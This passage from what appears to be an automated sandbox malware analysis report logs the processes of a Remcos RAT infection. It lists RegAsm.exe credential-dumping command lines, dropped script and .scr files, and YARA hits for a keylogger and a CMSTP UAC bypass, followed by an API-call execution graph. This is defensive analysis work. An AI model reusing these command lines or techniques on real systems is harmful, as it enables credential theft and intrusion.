                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                        Start time:07:39:58
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                        Start time:07:40:04
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                        Start time:07:40:04
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                                                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                        Start time:07:40:05
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                                                                                                                                                                                        Imagebase:0x810000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                        Start time:07:40:05
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yzbzlbqtwhlotogkfeks"
                                                                                                                                                                                        Imagebase:0xbf0000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                        Start time:07:40:05
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                                                                                                                                                                                        Imagebase:0x60000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                        Start time:07:40:05
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                                                                                                                                                                                        Imagebase:0xb50000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                        Start time:07:40:08
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ilkgo.vbs"
                                                                                                                                                                                        Imagebase:0xc80000
                                                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                        Start time:07:40:09
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js"
                                                                                                                                                                                        Imagebase:0x7ff6e26d0000
                                                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                        Start time:07:40:11
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr" "C:\Users\user\AppData\Local\DesignInno Innovations\H"
                                                                                                                                                                                        Imagebase:0xcf0000
                                                                                                                                                                                        File size:893'608 bytes
                                                                                                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 5%, ReversingLabs
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:31.4%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:41.7%
                                                                                                                                                                                          Total number of Nodes:927
                                                                                                                                                                                          Total number of Limit Nodes:50
                                                                                                                                                                                          execution_graph 2066 7ff7d2a63910 2067 7ff7d2a63933 2066->2067 2068 7ff7d2a63a09 2066->2068 2067->2068 2071 7ff7d2a63948 2067->2071 2072 7ff7d2a63a11 GetDesktopWindow 2067->2072 2069 7ff7d2a63954 2068->2069 2070 7ff7d2a63b1a EndDialog 2068->2070 2070->2069 2074 7ff7d2a6394c 2071->2074 2075 7ff7d2a6397b 2071->2075 2089 7ff7d2a64c68 6 API calls 2072->2089 2074->2069 2076 7ff7d2a6395b TerminateThread 2074->2076 2075->2069 2077 7ff7d2a63985 ResetEvent 2075->2077 2076->2070 2094 7ff7d2a64dcc 2077->2094 2080 7ff7d2a63a9b SetWindowTextA CreateThread 2080->2069 2082 7ff7d2a63ae8 2080->2082 2081 7ff7d2a63a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2081->2080 2084 7ff7d2a64dcc 24 API calls 2082->2084 2086 7ff7d2a63b07 2084->2086 2085 7ff7d2a639e4 SetEvent 2123 7ff7d2a63b40 2085->2123 2086->2068 2087 7ff7d2a639cc SetEvent 2087->2069 2091 7ff7d2a64d3f SetWindowPos 2089->2091 2130 7ff7d2a68470 2091->2130 2095 7ff7d2a64e49 LoadStringA 2094->2095 2096 7ff7d2a65024 2094->2096 2098 7ff7d2a64e73 2095->2098 2099 7ff7d2a64eb5 2095->2099 2097 7ff7d2a68470 7 API calls 2096->2097 2100 7ff7d2a639c3 2097->2100 2139 7ff7d2a67f04 2098->2139 2101 7ff7d2a64f31 2099->2101 2108 7ff7d2a64ec1 LocalAlloc 2099->2108 2100->2085 2100->2087 2105 7ff7d2a64f8e LocalAlloc 2101->2105 2106 7ff7d2a64f44 LocalAlloc 2101->2106 2104 7ff7d2a64e81 MessageBoxA 2104->2096 2105->2096 2118 7ff7d2a64f2c 2105->2118 2106->2096 2112 7ff7d2a64f79 2106->2112 2108->2096 2114 7ff7d2a64f14 2108->2114 2115 7ff7d2a6114c _vsnprintf 2112->2115 2113 7ff7d2a64fbc MessageBeep 2116 7ff7d2a67f04 13 API calls 2113->2116 2154 7ff7d2a6114c 2114->2154 2115->2118 2119 7ff7d2a64fd3 2116->2119 2118->2113 2120 7ff7d2a64fdc MessageBoxA LocalFree 2119->2120 2122 7ff7d2a67e34 2 API calls 2119->2122 2120->2096 2122->2120 2124 7ff7d2a63b4c MsgWaitForMultipleObjects 2123->2124 2125 7ff7d2a63b74 PeekMessageA 2124->2125 2126 7ff7d2a63be5 2124->2126 2125->2124 2127 7ff7d2a63b99 2125->2127 2126->2068 2127->2124 2127->2126 2128 7ff7d2a63ba7 DispatchMessageA 2127->2128 2129 7ff7d2a63bb8 PeekMessageA 2127->2129 2128->2129 2129->2127 2131 7ff7d2a68479 2130->2131 2132 7ff7d2a63a2f 2131->2132 2133 7ff7d2a684d0 RtlCaptureContext RtlLookupFunctionEntry 2131->2133 2132->2080 2132->2081 2134 7ff7d2a68557 2133->2134 2135 7ff7d2a68515 RtlVirtualUnwind 2133->2135 2138 7ff7d2a68494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2134->2138 2135->2134 2140 7ff7d2a67f44 GetVersionExA 2139->2140 2149 7ff7d2a68076 2139->2149 2141 7ff7d2a67f6d 2140->2141 2140->2149 2144 7ff7d2a67f90 GetSystemMetrics 2141->2144 2141->2149 2142 7ff7d2a68470 7 API calls 2143 7ff7d2a64e78 2142->2143 2143->2104 2150 7ff7d2a67e34 2143->2150 2145 7ff7d2a67fa7 RegOpenKeyExA 2144->2145 2144->2149 2146 7ff7d2a67fdc RegQueryValueExA RegCloseKey 2145->2146 2145->2149 2148 7ff7d2a68026 2146->2148 2146->2149 2147 7ff7d2a68065 CharNextA 2147->2148 2148->2147 2148->2149 2149->2142 2151 7ff7d2a67edd 2150->2151 2152 7ff7d2a67e5a EnumResourceLanguagesA 2150->2152 2151->2104 2152->2151 2153 7ff7d2a67e9f EnumResourceLanguagesA 2152->2153 2153->2151 2155 7ff7d2a61178 _vsnprintf 2154->2155 2156 7ff7d2a61199 2154->2156 2155->2156 2156->2118 2157 7ff7d2a65690 2158 7ff7d2a63b40 4 API calls 2157->2158 2159 7ff7d2a656b1 2158->2159 2160 7ff7d2a656c2 WriteFile 2159->2160 2162 7ff7d2a656ba 2159->2162 2161 7ff7d2a656f9 2160->2161 2160->2162 2161->2162 2163 7ff7d2a65725 SendDlgItemMessageA 2161->2163 2163->2162 2164 7ff7d2a658b0 2165 7ff7d2a658ee 2164->2165 2166 7ff7d2a65904 2164->2166 2167 7ff7d2a65770 CloseHandle 2165->2167 2171 7ff7d2a658fc 2165->2171 2169 7ff7d2a65a29 2166->2169 2166->2171 2174 7ff7d2a6591a 2166->2174 2167->2171 2168 7ff7d2a68470 7 API calls 2170 7ff7d2a65af4 2168->2170 2172 7ff7d2a65a35 SetWindowTextA 2169->2172 2173 7ff7d2a65a4a 2169->2173 2171->2168 2172->2173 2173->2171 2192 7ff7d2a651bc GetFileAttributesA 2173->2192 2174->2171 2176 7ff7d2a65982 DosDateTimeToFileTime 2174->2176 2176->2171 2177 7ff7d2a659a3 LocalFileTimeToFileTime 2176->2177 2177->2171 2178 7ff7d2a659c1 SetFileTime 2177->2178 2178->2171 2180 7ff7d2a659e9 2178->2180 2189 7ff7d2a65770 2180->2189 2185 7ff7d2a65ac1 2211 7ff7d2a6527c LocalAlloc 2185->2211 2188 7ff7d2a65acb 2188->2171 2190 7ff7d2a657a4 CloseHandle 2189->2190 2191 7ff7d2a6578f SetFileAttributesA 2189->2191 2190->2191 2191->2171 2193 7ff7d2a6525f 2192->2193 2195 7ff7d2a651de 2192->2195 2193->2171 2199 7ff7d2a65380 2193->2199 2194 7ff7d2a65246 SetFileAttributesA 2194->2193 2195->2193 2195->2194 2220 7ff7d2a67ac8 FindResourceA 2195->2220 2198 7ff7d2a6523c 2198->2194 2200 7ff7d2a653b3 2199->2200 2201 7ff7d2a653fd lstrcmpA 2200->2201 2202 7ff7d2a653d0 2200->2202 2204 7ff7d2a653f4 2201->2204 2205 7ff7d2a65454 2201->2205 2203 7ff7d2a64dcc 24 API calls 2202->2203 2203->2204 2204->2171 2204->2185 2205->2204 2206 7ff7d2a654a8 CreateFileA 2205->2206 2206->2204 2209 7ff7d2a654de 2206->2209 2207 7ff7d2a65561 CreateFileA 2207->2204 2208 7ff7d2a65549 CharNextA 2208->2209 2209->2204 2209->2207 2209->2208 2210 7ff7d2a65532 CreateDirectoryA 2209->2210 2210->2208 2212 7ff7d2a652aa 2211->2212 2213 7ff7d2a652d4 LocalAlloc 2211->2213 2214 7ff7d2a64dcc 24 API calls 2212->2214 2216 7ff7d2a65300 2213->2216 2219 7ff7d2a652cd 2213->2219 2214->2219 2217 7ff7d2a64dcc 24 API calls 2216->2217 2218 7ff7d2a65323 LocalFree 2217->2218 2218->2219 2219->2188 2221 7ff7d2a67b63 2220->2221 2222 7ff7d2a67b03 LoadResource 2220->2222 2223 7ff7d2a64dcc 24 API calls 2221->2223 2222->2221 2224 7ff7d2a67b1d DialogBoxIndirectParamA FreeResource 2222->2224 2225 7ff7d2a67b82 2223->2225 2224->2221 2227 7ff7d2a65228 2224->2227 2225->2227 2227->2193 2227->2194 2227->2198 2984 7ff7d2a680d0 2986 7ff7d2a680e2 2984->2986 2991 7ff7d2a68818 GetModuleHandleW 2986->2991 2987 7ff7d2a68149 __set_app_type 2988 7ff7d2a68186 2987->2988 2989 7ff7d2a6819c 2988->2989 2990 7ff7d2a6818f __setusermatherr 2988->2990 2990->2989 2992 7ff7d2a6882d 2991->2992 2992->2987 2993 7ff7d2a678b0 2994 7ff7d2a678fd 2993->2994 2995 7ff7d2a67ba8 CharPrevA 2994->2995 2996 7ff7d2a67935 CreateFileA 2995->2996 2997 7ff7d2a6797e WriteFile 2996->2997 2998 7ff7d2a67970 2996->2998 2999 7ff7d2a679a2 CloseHandle 2997->2999 3001 7ff7d2a68470 7 API calls 2998->3001 2999->2998 3002 7ff7d2a679d5 3001->3002 3003 7ff7d2a64a30 3004 7ff7d2a64a39 SendMessageA 3003->3004 3005 7ff7d2a64a50 3003->3005 3004->3005 3006 7ff7d2a63530 3007 7ff7d2a63557 3006->3007 3008 7ff7d2a63802 EndDialog 3006->3008 3009 7ff7d2a6377e GetDesktopWindow 3007->3009 3010 7ff7d2a63567 3007->3010 3011 7ff7d2a6356b 3008->3011 3012 7ff7d2a64c68 14 API calls 3009->3012 3010->3011 3014 7ff7d2a6357b 3010->3014 3015 7ff7d2a63635 GetDlgItemTextA 3010->3015 3013 7ff7d2a63795 SetWindowTextA SendDlgItemMessageA 3012->3013 3013->3011 3017 7ff7d2a637d8 GetDlgItem EnableWindow 3013->3017 3018 7ff7d2a63618 EndDialog 3014->3018 3019 7ff7d2a63584 3014->3019 3016 7ff7d2a6365e 3015->3016 3039 7ff7d2a636e9 3015->3039 3025 7ff7d2a63694 GetFileAttributesA 3016->3025 3016->3039 3017->3011 3018->3011 3019->3011 3020 7ff7d2a63591 LoadStringA 3019->3020 3021 7ff7d2a635de 3020->3021 3031 7ff7d2a635bd 3020->3031 3043 7ff7d2a64a60 LoadLibraryA 3021->3043 3023 7ff7d2a64dcc 24 API calls 3023->3011 3028 7ff7d2a636a8 3025->3028 3029 7ff7d2a636fa 3025->3029 3026 7ff7d2a64dcc 24 API calls 3042 7ff7d2a635d7 3026->3042 3027 7ff7d2a635eb SetDlgItemTextA 3027->3011 3027->3031 3033 7ff7d2a64dcc 24 API calls 3028->3033 3032 7ff7d2a67ba8 CharPrevA 3029->3032 3030 7ff7d2a6374b EndDialog 3030->3011 3031->3026 3035 7ff7d2a6370e 3032->3035 3034 7ff7d2a636cb 3033->3034 3034->3011 3036 7ff7d2a636d4 CreateDirectoryA 3034->3036 3037 7ff7d2a66b70 31 API calls 3035->3037 3036->3029 3036->3039 3038 7ff7d2a63716 3037->3038 3038->3039 3040 7ff7d2a63721 3038->3040 3039->3023 3041 7ff7d2a66ca4 38 API calls 3040->3041 3040->3042 3041->3042 3042->3011 3042->3030 3044 7ff7d2a64c20 3043->3044 3045 7ff7d2a64aa0 GetProcAddress 3043->3045 3048 7ff7d2a64dcc 24 API calls 3044->3048 3046 7ff7d2a64c0a FreeLibrary 3045->3046 3047 7ff7d2a64ac2 GetProcAddress 3045->3047 3046->3044 3047->3046 3049 7ff7d2a64ae2 GetProcAddress 3047->3049 3050 7ff7d2a635e3 3048->3050 3049->3046 3051 7ff7d2a64b04 3049->3051 3050->3011 3050->3027 3052 7ff7d2a64b13 GetTempPathA 3051->3052 3057 7ff7d2a64b65 3051->3057 3053 7ff7d2a64b2b 3052->3053 3053->3053 3054 7ff7d2a64b34 CharPrevA 3053->3054 3055 7ff7d2a64b4e CharPrevA 3054->3055 3054->3057 3055->3057 3056 7ff7d2a64bee FreeLibrary 3056->3050 3057->3056 3058 7ff7d2a633f0 3059 7ff7d2a634ec 3058->3059 3060 7ff7d2a63402 3058->3060 3062 7ff7d2a634f5 SendDlgItemMessageA 3059->3062 3063 7ff7d2a634e5 3059->3063 3061 7ff7d2a6340f 3060->3061 3064 7ff7d2a63441 GetDesktopWindow 3060->3064 3061->3063 3065 7ff7d2a63430 EndDialog 3061->3065 3062->3063 3066 7ff7d2a64c68 14 API calls 3064->3066 3065->3063 3067 7ff7d2a63458 6 API calls 3066->3067 3067->3063 3068 7ff7d2a65870 GlobalAlloc 3069 7ff7d2a68750 3070 7ff7d2a68782 3069->3070 3071 7ff7d2a6875f 3069->3071 3071->3070 3072 7ff7d2a6877b ?terminate@ 3071->3072 3072->3070 3073 7ff7d2a68790 SetUnhandledExceptionFilter 3074 7ff7d2a681b0 __getmainargs 3075 7ff7d2a68b30 _XcptFilter 3076 7ff7d2a68417 3077 7ff7d2a68426 _exit 3076->3077 3078 7ff7d2a6842f 3076->3078 3077->3078 3079 7ff7d2a68438 _cexit 3078->3079 3080 7ff7d2a68444 3078->3080 3079->3080 3081 7ff7d2a63840 3082 7ff7d2a6385a 3081->3082 3083 7ff7d2a63852 3081->3083 3084 7ff7d2a638ec EndDialog 3082->3084 3087 7ff7d2a6385f 3082->3087 3083->3082 3085 7ff7d2a6388e GetDesktopWindow 3083->3085 3084->3087 3086 7ff7d2a64c68 14 API calls 3085->3086 3088 7ff7d2a638a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3086->3088 3088->3087 3089 7ff7d2a61500 3090 7ff7d2a61557 GetDesktopWindow 3089->3090 3091 7ff7d2a61530 3089->3091 3092 7ff7d2a64c68 14 API calls 3090->3092 3093 7ff7d2a61542 EndDialog 3091->3093 3094 7ff7d2a61553 3091->3094 3095 7ff7d2a6156e LoadStringA SetDlgItemTextA MessageBeep 3092->3095 3093->3094 3096 7ff7d2a68470 7 API calls 3094->3096 3095->3094 3097 7ff7d2a615d0 3096->3097 3098 7ff7d2a633a0 3099 7ff7d2a633ac 3098->3099 3100 7ff7d2a633bb CallWindowProcA 3098->3100 3099->3100 3101 7ff7d2a633b7 3099->3101 3100->3101 3102 7ff7d2a655e0 3103 7ff7d2a65641 ReadFile 3102->3103 3104 7ff7d2a6560d 3102->3104 3103->3104 3105 7ff7d2a657e0 3106 7ff7d2a6581e 3105->3106 3108 7ff7d2a657fc 3105->3108 3107 7ff7d2a6583d SetFilePointer 3106->3107 3106->3108 3107->3108 2228 7ff7d2a68200 2247 7ff7d2a68964 2228->2247 2232 7ff7d2a6824b 2233 7ff7d2a6825d 2232->2233 2234 7ff7d2a68277 Sleep 2232->2234 2235 7ff7d2a6826d _amsg_exit 2233->2235 2238 7ff7d2a68284 2233->2238 2234->2232 2235->2238 2236 7ff7d2a682fc _initterm 2239 7ff7d2a68319 _IsNonwritableInCurrentImage 2236->2239 2237 7ff7d2a682dd 2238->2236 2238->2237 2238->2239 2239->2237 2240 7ff7d2a6837d 2239->2240 2241 7ff7d2a683f8 _ismbblead 2239->2241 2251 7ff7d2a62c54 GetVersion 2240->2251 2241->2239 2244 7ff7d2a683c7 exit 2245 7ff7d2a683cf 2244->2245 2245->2237 2246 7ff7d2a683d8 _cexit 2245->2246 2246->2237 2248 7ff7d2a68209 GetStartupInfoW 2247->2248 2249 7ff7d2a68990 6 API calls 2247->2249 2248->2232 2250 7ff7d2a68a0f 2249->2250 2250->2248 2252 7ff7d2a62c7b 2251->2252 2253 7ff7d2a62cc3 2251->2253 2252->2253 2255 7ff7d2a62c7f GetModuleHandleW 2252->2255 2275 7ff7d2a62db4 2253->2275 2255->2253 2257 7ff7d2a62c97 GetProcAddress 2255->2257 2257->2253 2258 7ff7d2a62cb2 2257->2258 2258->2253 2259 7ff7d2a62d7f 2261 7ff7d2a62d8b CloseHandle 2259->2261 2262 7ff7d2a62d97 2259->2262 2261->2262 2262->2244 2262->2245 2266 7ff7d2a62d29 2266->2259 2267 7ff7d2a62d5e 2266->2267 2268 7ff7d2a62d33 2266->2268 2270 7ff7d2a62d67 ExitWindowsEx 2267->2270 2271 7ff7d2a62d7a 2267->2271 2269 7ff7d2a64dcc 24 API calls 2268->2269 2273 7ff7d2a62d59 2269->2273 2270->2259 2392 7ff7d2a61c0c GetCurrentProcess OpenProcessToken 2271->2392 2273->2259 2273->2267 2276 7ff7d2a68b09 2275->2276 2277 7ff7d2a62df9 memset memset 2276->2277 2400 7ff7d2a65050 FindResourceA SizeofResource 2277->2400 2280 7ff7d2a62e53 CreateEventA SetEvent 2281 7ff7d2a65050 7 API calls 2280->2281 2282 7ff7d2a62e92 2281->2282 2284 7ff7d2a62ed5 2282->2284 2287 7ff7d2a62fa3 2282->2287 2294 7ff7d2a62e96 2282->2294 2283 7ff7d2a64dcc 24 API calls 2312 7ff7d2a62fd9 2283->2312 2288 7ff7d2a65050 7 API calls 2284->2288 2285 7ff7d2a64dcc 24 API calls 2320 7ff7d2a62eb4 2285->2320 2286 7ff7d2a68470 7 API calls 2289 7ff7d2a62cd4 2286->2289 2405 7ff7d2a670a8 2287->2405 2291 7ff7d2a62eec 2288->2291 2289->2259 2321 7ff7d2a630ec 2289->2321 2293 7ff7d2a62efe CreateMutexA 2291->2293 2291->2294 2293->2287 2295 7ff7d2a62f22 GetLastError 2293->2295 2294->2285 2295->2287 2298 7ff7d2a62f35 2295->2298 2296 7ff7d2a62fc4 2299 7ff7d2a62fde FindResourceExA 2296->2299 2300 7ff7d2a62fcd 2296->2300 2297 7ff7d2a62fb5 2297->2283 2302 7ff7d2a62f4a 2298->2302 2303 7ff7d2a62f62 2298->2303 2304 7ff7d2a63014 2299->2304 2305 7ff7d2a62fff LoadResource 2299->2305 2432 7ff7d2a6204c 2300->2432 2306 7ff7d2a64dcc 24 API calls 2302->2306 2309 7ff7d2a64dcc 24 API calls 2303->2309 2307 7ff7d2a6301d #17 2304->2307 2308 7ff7d2a63029 2304->2308 2305->2304 2310 7ff7d2a62f60 2306->2310 2307->2308 2311 7ff7d2a6303a 2308->2311 2308->2312 2313 7ff7d2a62f7c 2309->2313 2314 7ff7d2a62f81 CloseHandle 2310->2314 2447 7ff7d2a63bf4 GetVersionExA 2311->2447 2312->2286 2313->2287 2313->2314 2314->2312 2319 7ff7d2a67ac8 28 API calls 2319->2320 2320->2312 2322 7ff7d2a63116 2321->2322 2323 7ff7d2a63141 2321->2323 2324 7ff7d2a63134 2322->2324 2537 7ff7d2a660a4 2322->2537 2557 7ff7d2a65fe4 2323->2557 2715 7ff7d2a63f74 2324->2715 2329 7ff7d2a63236 2334 7ff7d2a68470 7 API calls 2329->2334 2336 7ff7d2a62ce1 2334->2336 2335 7ff7d2a6315b GetSystemDirectoryA 2337 7ff7d2a67ba8 CharPrevA 2335->2337 2367 7ff7d2a661ec 2336->2367 2338 7ff7d2a63186 LoadLibraryA 2337->2338 2339 7ff7d2a631c9 FreeLibrary 2338->2339 2340 7ff7d2a6319f GetProcAddress 2338->2340 2342 7ff7d2a631e4 2339->2342 2343 7ff7d2a63273 SetCurrentDirectoryA 2339->2343 2340->2339 2341 7ff7d2a631ba DecryptFileA 2340->2341 2341->2339 2342->2343 2345 7ff7d2a631f0 GetWindowsDirectoryA 2342->2345 2344 7ff7d2a6320d 2343->2344 2351 7ff7d2a63291 2343->2351 2349 7ff7d2a64dcc 24 API calls 2344->2349 2345->2344 2347 7ff7d2a6325a 2345->2347 2346 7ff7d2a6331f 2346->2329 2354 7ff7d2a62318 18 API calls 2346->2354 2358 7ff7d2a63347 2346->2358 2620 7ff7d2a66ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2347->2620 2352 7ff7d2a6322b 2349->2352 2351->2346 2355 7ff7d2a632fb 2351->2355 2360 7ff7d2a632cb 2351->2360 2734 7ff7d2a67700 GetLastError 2352->2734 2353 7ff7d2a63368 2353->2329 2364 7ff7d2a63383 2353->2364 2354->2358 2647 7ff7d2a65d90 2355->2647 2357 7ff7d2a63230 2357->2329 2358->2353 2669 7ff7d2a640c4 2358->2669 2361 7ff7d2a67ac8 28 API calls 2360->2361 2363 7ff7d2a632f6 2361->2363 2363->2329 2735 7ff7d2a6772c 2363->2735 2745 7ff7d2a6494c 2364->2745 2368 7ff7d2a66214 2367->2368 2370 7ff7d2a6624c LocalFree LocalFree 2368->2370 2371 7ff7d2a66229 SetFileAttributesA DeleteFileA 2368->2371 2377 7ff7d2a66273 2368->2377 2369 7ff7d2a66311 2372 7ff7d2a66387 2369->2372 2375 7ff7d2a6632d RegOpenKeyExA 2369->2375 2370->2368 2371->2370 2373 7ff7d2a68470 7 API calls 2372->2373 2374 7ff7d2a62ce8 2373->2374 2374->2259 2374->2266 2381 7ff7d2a62318 2374->2381 2375->2372 2376 7ff7d2a6635e RegDeleteValueA RegCloseKey 2375->2376 2376->2372 2377->2369 2378 7ff7d2a662f4 SetCurrentDirectoryA 2377->2378 2379 